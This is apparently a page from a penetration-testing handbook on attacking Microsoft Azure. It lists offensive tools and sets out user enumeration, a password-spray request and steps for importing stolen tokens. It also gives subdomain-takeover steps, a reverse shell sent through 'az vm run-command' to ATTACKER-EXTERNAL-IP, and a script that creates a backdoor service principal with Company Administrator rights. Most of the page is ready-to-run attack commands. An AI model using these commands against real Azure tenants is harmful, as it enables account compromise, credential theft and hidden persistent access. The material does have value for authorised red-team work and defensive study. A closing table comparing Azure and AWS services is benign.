Pentest Book
Search…
Azure

Basic Info

1
**Tools**
2
https://github.com/dirkjanm/ROADtools
3
https://github.com/dafthack/PowerMeta
4
https://github.com/NetSPI/MicroBurst
5
https://github.com/nccgroup/ScoutSuite
6
https://github.com/hausec/PowerZure
7
https://github.com/fox-it/adconnectdump
8
https://github.com/FSecureLABS/Azurite
9
https://github.com/mburrough/pentestingazureapps
10
https://github.com/Azure/Stormspotter
11
https://github.com/nccgroup/azucar
12
https://github.com/dafthack/MSOLSpray
13
https://github.com/BloodHoundAD/BloodHound
14
https://github.com/nccgroup/Carnivore
15
https://github.com/CrowdStrike/CRT
16
https://github.com/Kyuu-Ji/Awesome-Azure-Pentest
17
https://github.com/cyberark/blobhunter
18
19
- Check if company is using Azure AD:
20
https://login.microsoftonline.com/[email protected]&xml=1
21
- If NameSpaceType is "Managed", the company uses Azure AD
22
- Enumerate Azure AD emails
23
https://github.com/LMGsec/o365creeper
24
25
Auth methods:
26
• Password Hash Synchronization
27
◇ Azure AD Connect
28
◇ On-prem service synchronizes hashed user credentials to Azure
29
◇ User can authenticate directly to Azure services like O365 with their internal domain credential
30
• Pass Through Authentication
31
◇ Credentials stored only on-prem
32
◇ On-prem agent validates authentication requests to Azure AD
33
◇ Allows SSO to other Azure apps without creds stored in cloud
34
• Active Directory Federation Services (ADFS)
35
◇ Credentials stored only on-prem
36
◇ Federated trust is setup between Azure and on-prem AD to validate auth requests to the cloud
37
◇ For password attacks you would have to auth to the on-prem ADFS portal instead of Azure endpoints
38
• Certificate-based auth
39
◇ Client certs for authentication to API
40
◇ Certificate management in legacy Azure Service Management (ASM) makes it impossible to know who created a cert (persistence potential)
41
◇ Service Principals can be setup with certs to auth
42
• Conditional access policies
43
• Long-term access tokens
44
◇ Authentication to Azure with oAuth tokens
45
◇ Desktop CLI tools that can be used to auth store access tokens on disk
46
◇ These tokens can be reused on other MS endpoints
47
◇ We have a lab on this later!
48
• Legacy authentication portals
49
50
Recon:
51
• O365 Usage
52
◇ https://login.microsoftonline.com/[email protected]&xml=1
53
◇ https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/[email protected]?Protocol=Autodiscoverv1
54
• User enumeration on Azure can be performed at
55
https://login.Microsoft.com/common/oauth2/token
56
▪ This endpoint tells you if a user exists or not
57
◇ Detect invalid users while password spraying with:
58
▪ https://github.com/dafthack/MSOLSpray
59
◇ For on-prem OWA/EWS you can enumerate users with timing attacks (MailSniper)
60
• Auth 365 Recon:
61
(https://github.com/nyxgeek/o365recon
62
63
Microsoft Azure Storage:
64
• Microsoft Azure Storage is like Amazon S3
65
• Blob storage is for unstructured data
66
• Containers and blobs can be publicly accessible via access policies
67
• Predictable URL’s at core.windows.net
68
◇ storage-account-name.blob.core.windows.net
69
◇ storage-account-name.file.core.windows.net
70
◇ storage-account-name.table.core.windows.net
71
◇ storage-account-name.queue.core.windows.net
72
• The “Blob” access policy means anyone can anonymously read blobs, but can’t list the blobs in the container
73
• The “Container” access policy allows for listing containers and blobs
74
• Microburst https://github.com/NetSPI/MicroBurst
75
◇ Invoke-EnumerateAzureBlobs
76
◇ Brute forces storage account names, containers, and files
77
◇ Uses permutations to discover storage accounts
78
PS > Invoke-EnumerateAzureBlobs –Base
79
80
Password Attacks
81
• Password Spraying Microsoft Online (Azure/O365)
82
• Can spray https://login.microsoftonline.com
83
--
84
POST /common/oauth2/token HTTP/1.1
85
Accept: application/json
86
Content-Type: application/x-www-form-urlencoded
87
Host: login.microsoftonline.com
88
Content-Length: 195
89
Expect: 100-continue
90
Connection: close
91
92
resource=https%3A%2F%2Fgraph.windows.net&client_id=1b730954-1685-4b74-9bfd-
93
dac224a7b894&client_info=1&grant_type=password&username=user%40targetdomain.com&passwor
94
d=Winter2020&scope=openid
95
--
96
• MSOLSpray https://github.com/dafthack/MSOLSpray
97
◇ The script logs:
98
▪ If a user cred is valid
99
▪ If MFA is enabled on the account
100
▪ If a tenant doesn't exist
101
▪ If a user doesn't exist
102
▪ If the account is locked
103
▪ If the account is disabled
104
▪ If the password is expired
105
◇ https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-aadsts-error-codes
106
107
Password protections & Smart Lockout
108
• Azure Password Protection – Prevents users from picking passwords with certain words like seasons, company name, etc.
109
• Azure Smart Lockout – Locks out auth attempts whenever brute force or spray attempts are detected.
110
◇ Can be bypassed with FireProx + MSOLSpray
111
◇ https://github.com/ustayready/fireprox
112
113
Phising session hijack
114
• Evilginx2 and Modlishka
115
◇ MitM frameworks for harvesting creds/sessions
116
◇ Can also evade 2FA by riding user sessions
117
• With a hijacked session we need to move fast
118
• Session timeouts can limit access
119
• Persistence is necessary
120
121
Steal Access Tokens
122
• Azure config files:
123
web.config
124
app.config
125
.cspkg
126
.publishsettings
127
• Azure Cloud Service Packages (.cspkg)
128
• Deployment files created by Visual Studio
129
• Possible other Azure service integration (SQL, Storage, etc.)
130
• Look through cspkg zip files for creds/certs
131
• Search Visual Studio Publish directory
132
\bin\debug\publish
133
• Azure Publish Settings files (.publishsettings)
134
◇ Designed to make it easier for developers to push code to Azure
135
◇ Can contain a Base64 encoded Management Certificate
136
◇ Sometimes cleartext credentials
137
◇ Open publishsettings file in text editor
138
◇ Save “ManagementCertificate” section into a new .pfx file
139
◇ There is no password for the pfx
140
◇ Search the user’s Downloads directory and VS projects
141
• Check %USERPROFILE&\.azure\ for auth tokens
142
• During an authenticated session with the Az PowerShell module a TokenCache.dat file gets generated in the %USERPROFILE%\.azure\ folder.
143
• Also search disk for other saved context files (.json)
144
• Multiple tokens can exist in the same context file
145
146
Post-Compromise
147
• What can we learn with a basic user?
148
• Subscription Info
149
• User Info
150
• Resource Groups
151
• Scavenging Runbooks for Creds
152
• Standard users can access Azure domain information and isn’t usually locked down
153
• Authenticated users can go to portal.azure.com and click Azure Active Directory
154
• O365 Global Address List has this info as well
155
• Even if portal is locked down PowerShell cmdlets will still likely work
156
• There is a company-wide setting that locks down the entire org from viewing Azure info via cmd line: Set-MsolCompanySettings – UsersPermissionToReadOtherUsersEnabled $false
157
158
Azure: CLI Access
159
• Azure Service Management (ASM or Azure “Classic”)
160
◇ Legacy and recommended to not use
161
• Azure Resource Manager (ARM)
162
◇ Added service principals, resource groups, and more
163
◇ Management Certs not supported
164
• PowerShell Modules
165
◇ Az, AzureAD & MSOnline
166
• Azure Cross-platform CLI Tools
167
◇ Linux and Windows client
168
169
Azure: Subscriptions
170
• Organizations can have multiple subscriptions
171
• A good first step is to determine what subscription you are in
172
• The subscription name is usually informative
173
• It might have “Prod”, or “Dev” in the title
174
• Multiple subscriptions can be under the same Azure AD directory (tenant)
175
• Each subscription can have multiple resource groups
176
177
Azure User Information
178
• Built-In Azure Subscription Roles
179
◇ Owner (full control over resource)
180
◇ Contributor (All rights except the ability to change permissions)
181
◇ Reader (can only read attributes)
182
◇ User Access Administrator (manage user access to Azure resources)
183
• Get the current user’s role assignement
184
PS> Get-AzRoleAssignment
185
• If the Azure portal is locked down it is still possible to access Azure AD user information via MSOnline cmdlets
186
• The below examples enumerate users and groups
187
PS> Import-Module MSOnline
188
PS> Connect-MsolService
189
Or
190
PS> $credential = Get-Credential
191
PS> Connect-MsolService -Credential $credential
192
193
PS> Get-MSolUser -All
194
PS> Get-MSolGroup –All
195
PS> Get-MSolGroupMember –GroupObjectId
196
PS> Get-MSolCompanyInformation
197
• Pipe Get-MSolUser –All to format list to get all user attributes
198
PS> Get-MSolUser –All | fl
199
200
Azure Resource Groups
201
• Resource Groups collect various services for easier management
202
• Recon can help identify the relationships between services such as WebApps and SQL
203
PS> Get-AzResource
204
PS> Get-AzResourceGroup
205
PS> Get-AzStorageAccount
206
Azure: Runbooks
207
• Azure Runbooks automate various tasks in Azure
208
• Require an Automation Account and can contain sensitive information like passwords
209
PS> Get-AzAutomationAccount
210
PS> Get-AzAutomationRunbook -AutomationAccountName -ResourceGroupName
211
• Export a runbook with:
212
PS> Export-AzAutomationRunbook -AutomationAccountName -ResourceGroupName -Name -OutputFolder .\Desktop\
213
214
Azure VMs:
215
PS> Get-AzVM
216
PS> $vm = Get-AzVM -Name "VM Name"
217
PS> $vm.OSProfile
218
PS> Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1
219
220
Azure Virtual Networks:
221
PS> Get-AzVirtualNetwork
222
PS> Get-AzPublicIpAddress
223
PS> Get-AzExpressRouteCircuit
224
PS> Get-AzVpnConnection
225
226
# Quick 1-liner to search all Azure AD user attributes for passwords after auth'ing with Connect-MsolService:
227
$x=Get-MsolUser;foreach($u in $x){$p = @();$u|gm|%{$p+=$_.Name};ForEach($s in $p){if($u.$s -like "*password*"){Write("[*]"+$u.UserPrincipalName+"["+$s+"]"+" : "+$u.$s)}}}
228
229
# https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html
230
231
# Removing Azure services
232
- Under Azure Portal -> Resource Groups
233
234
# Interesting metadata instance urls:
235
http://169.254.169.254/metadata/v1/maintenance
236
http://169.254.169.254/metadata/instance?api-version=2017-04-02
237
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
Copied!

Traditional AD - Azure AD comparision

Basic Azure AD concepts and tips

1
- Source of authentication for Office 365, Azure Resource Manager, and anything else you integrate with it.
2
3
- Powershell interaction:
4
• MSOnline PowerShell module
5
• Focusses on Office 365
6
• Some Office 365 specific features
7
• AzureAD PowerShell module
8
• General Azure AD
9
• Different feature set
10
• Azure CLI / Az powershell module
11
• More focus on Azure Resource Manager
12
13
- Azure AD principals
14
• Users
15
• Devices
16
• Applications
17
18
- Azure AD roles
19
• RBAC Roles are only used for Azure Resource Manager
20
• Office 365 uses administrator roles exclusively
21
22
- Azure AD admin roles
23
• Global/Company administrator can do anything
24
• Limited administrator accounts
25
• Application Administrator
26
• Authentication Administrator
27
• Exchange Administrator
28
• Etc
29
• Roles are fixed
30
31
- Azure AD applications
32
• Documentation unclear
33
• Terminology different between documentation, APIs and Azure portal
34
• Complex permission system
35
• Most confusing part
36
• Examples:
37
• Microsoft Graph
38
• Azure Multi-Factor Auth Client
39
• Azure Portal
40
• Office 365 portal
41
• Azure ATP
42
• A default Office 365 Azure AD has about 200 service principals
43
(read: applications)
44
- App permissions
45
• Two types of privileges:
46
• Delegated permissions
47
• Require signed-in user present to utilize
48
• Application permissions
49
• Are assigned to the application, which can use them at any time
50
• These privileges are assigned to the service principal
51
• Every application defines permissions
52
• Can be granted to Service Principals
53
• Commonly used:
54
• Microsoft Graph permissions
55
• Azure AD Graph permissions
56
57
- Azure AD Sync Account
58
• Dump all on-premise password hashes (if PHS is enabled)
59
• Log in on the Azure portal (since it’s a user)
60
• Bypass conditional access policies for admin accounts
61
• Add credentials to service principals
62
• Modify service principals properties
63
64
If password hash sync is in use:
65
Compromised Azure AD connect Sync account = Compromised AD
66
67
• Encryption key is encrypted with DPAPI
68
• Decrypted version contains some blob with AES keys
69
• Uses AES-256 in CBC mode
70
71
Anyone with control over Service Principals can assign credentials to them and potentially escalate privileges.
72
73
Anyone who can edit properties* of the AZUREADSSOACC$ account, can impersonate any user in Azure AD using Kerberos (if no MFA)
74
Copied!

Azure attacks examples

1
# Password spraying
2
https://github.com/dafthack/MSOLSpray/MSOLSpray.ps1
3
Create a text file with ten (10) fake users we will spray along with your own user account ([email protected] ). (Do not spray accounts you do not own. You may use my domain “glitchcloud.com” for generating fake target users) and save as userlist.txt
4
5
Import-Module .\MSOLSpray.ps1
6
Invoke-MSOLSpray -UserList .\userlist.txt -Password [the password you set for your test account]
7
8
# Access Token
9
10
PS> Import-Module Az
11
PS> Connect-AzAccount
12
or
13
PS> $credential = Get-Credential
14
PS>Connect-AzAccount -Credential $credential
15
16
PS> mkdir C:\Temp
17
PS> Save-AzContext -Path C:\Temp\AzureAccessToken.json
18
PS> mkdir “C:\Temp\Live Tokens”
19
20
# Auth
21
Connect-AzAccount
22
## Or this way sometimes gets around MFA restrictions
23
$credential = Get-Credential
24
Connect-AzAccount -Credential $credential
25
26
Open Windows Explorer and type %USERPROFILE%\.Azure\ and hit enter
27
• Copy TokenCache.dat & AzureRmContext.json to C:\Temp\Live Tokens
28
• Now close your authenticated PowerShell window!
29
30
Delete everything in %USERPROFILE%\.azure\
31
• Start a brand new PowerShell window and run:
32
PS> Import-Module Az
33
PS> Get-AzContext -ListAvailable
34
• You shouldn’t see any available contexts currently
35
36
• In your PowerShell window let’s manipulate the stolen TokenCache.dat and AzureRmContext.json files so we can import it into our PowerShell session
37
38
PS> $bytes = Get-Content "C:\Temp\Live Tokens\TokenCache.dat" -Encoding byte
39
PS> $b64 = [Convert]::ToBase64String($bytes)
40
PS> Add-Content "C:\Temp\Live Tokens\b64-token.txt" $b64
41
42
• Now let’s add the b64-token.txt to the AzureRmContext.json file.
43
• Open the C:\Temp\Live Tokens folder.
44
• Open AzureRmContext.json file in a notepad and find the line near the end of the file title “CacheData”. It should be null.
45
• Delete the word “null” on this line
46
• Where “null” was add two quotation marks (“”) and then paste the contents of b64-token.txt in between them.
47
• Save this file as C:\Temp\Live Tokens\StolenToken.json
48
• Let’s import the new token
49
50
PS> Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json’
51
52
• We are now operating in an authenticated session to Azure
53
54
PS> $context = Get-AzContext
55
PS> $context.Account
56
57
• You can import the previously exported context (AzureAccessToken.json) the same way
58
59
# Azure situational awareness
60
• GOAL: Use the MSOnline and Az PowerShell modules to do basic enumeration of an Azure account post-compromise.
61
• In this lab you will authenticate to Azure using your Azure AD account you setup. Then, you will import the MSOnline and Az PowerShell modules and try out some of the various modules that assist in enumerating Azure resource usage.
62
63
• Start a new PowerShell window and import both the MSOnline and Az modules
64
PS> Import-Module MSOnline
65
PS> Import-Module Az
66
• Authenticate to each service with your Azure AD account:
67
PS> Connect-AzAccount
68
PS> Connect-MsolService
69
• First get some basic Azure information
70
PS> Get-MSolCompanyInformation
71
• Some interesting items here are
72
◇ UsersPermissionToReadOtherUsersEnabled
73
◇ DirSyncServiceAccount
74
◇ PasswordSynchronizationEnabled
75
◇ Address/phone/emails
76
• Next, we will start looking at the subscriptions associated with the account as well as look at the current context we are operating in. Look at the “Name” of the subscription and context for possible indication as to what it is associated with.
77
PS> Get-AzSubscription
78
PS> $context = Get-AzContext
79
PS> $context.Name
80
PS> $context.Account
81
• Enumerating the roles assigned to your user will help identify what permissions you might have on the subscription as well as who to target for escalation.
82
PS> Get-AzRoleAssignment
83
• List out the users on the subscription. This is the equivalent of “net users /domain” in on-prem AD
84
PS> Get-MSolUser -All
85
PS> Get-AzAdApplication
86
PS> Get-AzWebApp
87
PS> Get-AzSQLServer
88
PS> Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName
89
PS> Get-AzSqlServerFirewallRule –ServerName $ServerName -ResourceGroupName $ResourceGroupName
90
PS> Get-AzSqlServerActiveDirectoryAdminstrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName
91
• The user you setup likely doesn’t have any resources currently associated with it, but these commands will help to understand the specific resources a user you gain access to has.
92
PS> Get-AzResource
93
PS> Get-AzResourceGroup
94
• Choose a subscription
95
PS> Select-AzSubscription -SubscriptionID "SubscriptionID"
96
• There are many other functions.
97
• Use Get-Module to list out the other Az module groups
98
• To list out functions available within each module use the below command substituting the value of the “Name” parameter.
99
PS> Get-Module -Name Az.Accounts | Select-Object -ExpandProperty ExportedCommands
100
PS> Get-Module -Name MSOnline | Select-Object -ExpandProperty ExportedCommands
Copied!

Azure Block Blobs (S3 equivalent) attacks

1
# Discovering with Google Dorks
2
site:*.blob.core.windows.net
3
site:*.blob.core.windows.net ext:xlsx | ext:csv "password"
4
# Discovering with Dns enumeration
5
python dnscan.py -d blob.core.windows.net -w subdomains-100.txt
6
7
# When you found one try with curl, an empty container respond with 400
8
9
# List containers
10
az storage container list --connection-string '<connection string>'
11
# List blobs in containers
12
az storage blob list --container-name <container name> --connection-string '<connection string>'
13
# Download blob from container
14
az storage blob download --container-name <container name> --name <file> --file /tmp/<file> --connection-string '<connection string>'
Copied!

Azure subdomain takeovers

1
# Azure CloudApp: cloudapp.net
2
1 Check CNAME with dig pointing to cloudapp.net
3
2 Go to https://portal.azure.com/?quickstart=True#create/Microsoft.CloudService
4
3 Register unclaimed domain which CNAME is pointing
5
6
7
# Azure Websites: azurewebsites.net
8
1 Check CNAME with dig pointing to azurewebsites.net
9
2 Go to https://portal.azure.com/#create/Microsoft.WebSite
10
3 Register unclaimed domain which CNAME is pointing
11
4 Register domain on the Custom domains section of the dashboard
12
13
# Azure VM: cloudapp.azure.com
14
1 Check CNAME with dig pointing to *.region.cloudapp.azure.com
15
2 Registering a new VM in the same region with size Standard_B1ls (cheapest) with 80 and 443 open
16
3 Go to Configuration and set the domain name which CNAME is pointing
Copied!

Other Azure Services

1
# Azure App Services Subdomain Takeover
2
- For target example.com you found users.example.com
3
- Go https://users.galaxybutter.com and got an error
4
- dig CNAME users.galaxybutter.com and get an Azure App Services probably deprecated or removed
5
- Creat an App Service and point it to the missing CNAME
6
- Add a custom domain to the App Service
7
- Show custom content
8
9
# Azure Run Command
10
# Feature that allows you to execute commands without requiring SSH or SMB/RDP access to a machine. This is very similar to AWS SSM.
11
az login
12
az login --use-device-code #Login
13
az group list #List groups
14
az vm list -g GROUP-NAME #List VMs inside group
15
#Linux VM
16
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "id"
17
#Windos VM
18
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunPowerShellScript --scripts "whoami"
19
# Linux Reverse Shell Azure Command
20
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "bash -c \"bash -i >& /dev/tcp/ATTACKER-EXTERNAL-IP/9090 0>&1\""
21
22
# Azure SQL Databases
23
- MSSQL syntaxis
24
- Dorks: "database.windows.net" site:pastebin.com
25
26
# Azure AD commands
27
az ad sp list --all
28
az ad app list --all
29
30
# Azure metadata service
31
http://169.254.169.254/metadata/instance
32
https://github.com/microsoft/azureimds
Copied!

Create Azure service principal as backdoor

1
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
2
$spn
3
$BSTR = ::SecureStringToBSTR($spn.Secret)
4
$UnsecureSecret = ::PtrToStringAuto($BSTR)
5
$UnsecureSecret
6
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
7
$role = Get-MsolRole -RoleName "Company Administrator"
8
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -
9
RoleMemberObjectId $sp.ObjectId
10
#Enter the AppID as username and what was returned for $UnsecureSecret as the password
11
in the Get-Credential prompt
12
$cred = Get-Credential
13
Connect-AzAccount -Credential $cred -Tenant “tenant ID" -ServicePrincipal
Copied!

Azure password reset

Azure Services Summary

Base services
Azure Service
Could be Called
Use this to...
Like AWS...
Virtual Machines
Servers
Move existing apps to the cloud without changing them. You manage the entire computer.
EC2
Cloud Services
Managed Virtual Machines
Run applications on virtual machines that you don't have to manage, but can partially manage.
Batch
Azure Distributed Processing
Work on a large chunk of data by divvying it up between a whole bunch of machines.
RemoteApp
Remote Desktop for Apps
Expose non-web apps to users. For example, run Excel on your iPad.
AppStream
Web Apps
Web Site Host
Run websites (.NET, Node.js, etc.) without managing anything extra. Scale automatically and easily.
Elastic Beanstalk
Mobile Apps
Mobile App Accelerator
Quickly get an app backend up and running.
Logic Apps
Visio for Doing Stuff
Chain steps together to get stuff done.
API Apps
API Host
Host your API's without any of the management overhead.
API Management
API Proxy
Expose an API and off-load things like billing, authentication, and caching.
API Gateway
Mobile
Azure Service
Could be Called
Use this to...
Like AWS...
Notification Hubs
Notification Blaster
Send notifications to all of your users, or groups of users based on things like zip code. All platforms.
SNS
Mobile Engagement
Mobile Psychic
Track what users are doing in your app, and customize experience based on this data.
Storage
Azure Service
Could be Called
Use this to...
Like AWS...
SQL Database
Azure SQL
Use the power of a SQL Server cluster without having to manage it.
RDS
Document DB
Azure NoSQL
Use an unstructured JSON database without having to manage it.
Dynamo DB
Redis Cache
Easy Cache
Cache files in memory in a scalable way.
Elasticache
Storage Blobs
Cloud File System
Store files, virtual disks, and build other storage services on top of.
S3
Azure Search
Index & Search
Add search capabilities to your website, or index data stored somewhere else.
CloudSearch
SQL Data Warehouse
Structured Report Database
Store all of your company's data in a structured format for reporting.
RedShift
Azure Data Lake
Unstructured Report Database
Store all of your company's data in any format for reporting.
HDInsight
Hosted Hadoop
Do Hadoopy things with massive amounts of data.
Machine Learning
Skynet
Train AI to predict the future using existing data. Examples include credit card fraud detection and Netflix movie recommendations.
Stream Analytics
Real-time data query
Look for patterns in data as it arrives.
Data Factory
Azure ETL
Orchestrate extract, transform, and load data processes.
Data Pipeline
Event Hubs
IoT Ingestor
Ingest data at ANY scale inexpensively.
Networking
Azure Service
Could be Called
Use this to...
Like AWS...
Virtual Network
Private Network
Put machines on the same, private network so that they talk to each other directly and privately. Expose services to the internet as needed.
ExpressRoute
Fiber to Azure
Connect privately over an insanely fast pipe to an Azure datacenter. Make your local network part of your Azure network.
Direct Connect
Load Balancer
Load Balancer
Split load between multiple services, and handle failures.
Traffic Manager
Datacenter Load Balancer
Split load between multiple datacenters, and handle datacenter outages.
DNS
DNS Provider
Run a DNS server so that your domain names map to the correct IP addresses.
Route53
VPN Gateway
Virtual Fiber to Azure
Connect privately to an Azure datacenter. Make your local network part of your Azure network.
Application Gateway
Web Site Proxy
Proxy all of your HTTP traffic. Host your SSL certs. Load balance with sticky sessions.
CDN
CDN
Make your sites faster and more scalable by putting your static files on servers around the world close to your end users.
Cloudfront
Media Services
Video Processor
Transcode video and distribute and manage it on the scale of the Olympics.
Elastic Transcoder
Management
Azure Service
Could be Called
Use this to...
Like AWS...
Azure Resource Manager
Declarative Configuration
Define your entire Azure architecture as a repeatable JSON file and deploy all at once.
CloudFormation
Developer
Azure Service
Could be Called
Use this to...
Like AWS...
Application Insights
App Analytics
View detailed information about how your apps (web, mobile, etc.) are used.
Mobile Analytics
Service Fabric
Cloud App Framework
Build a cloud optimized application that can scale and handle failures inexpensively.
Last modified 8mo ago